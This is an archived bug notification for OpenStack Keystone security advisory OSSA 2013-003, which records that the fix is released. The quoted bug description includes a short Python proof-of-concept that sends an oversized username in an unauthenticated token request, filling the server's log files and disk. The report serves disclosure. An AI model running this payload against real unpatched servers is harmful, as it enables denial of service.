yahoo-eng-team team mailing list archive

Thread
Date

[Bug 1098307] Re: [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

To: yahoo-eng-team@xxxxxxxxxxxxxxxxxxx
From: Morgan Fainberg <morgan.fainberg@xxxxxxxxx>
Date: Wed, 04 Jun 2014 23:34:21 -0000
Reply-to: Bug 1098307 <1098307@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

Looks like status was missed. Merged properly etc, old bug cleanup

** Changed in: keystone/essex
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1098307

Title:
  [OSSA 2013-003] unauthenticated POST to /tokens can fill up disk/logs

Status in OpenStack Identity (Keystone):
  Fix Released
Status in Keystone essex series:
  Fix Released
Status in Keystone folsom series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  A remote unauthenticated keystone user could potentially fill up the
  disk on a Keystone server by running the following python script:

  -----------------------
  from keystoneclient.v2_0 import client

  PASSWORD='foobar'
  TENANT='blah'
  USER = '00000' * 9999999

  keystone = client.Client(username=USER,
                           password=PASSWORD,
                           tenant_name=TENANT,
                           auth_url='http://localhost:5000/v2.0')

  -----------

  Running this script will increase the log file size by 100 MB per
  request. NOTE: This happens when running keystone at the default log
  levels:

  # verbose = False
  # debug = False

  
  Version-Release number of selected component (if applicable):

  openstack-keystone-2012.2.1-1.el6ost.noarch (Red Hat)

  How reproducible:

  *always*

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1098307/+subscriptions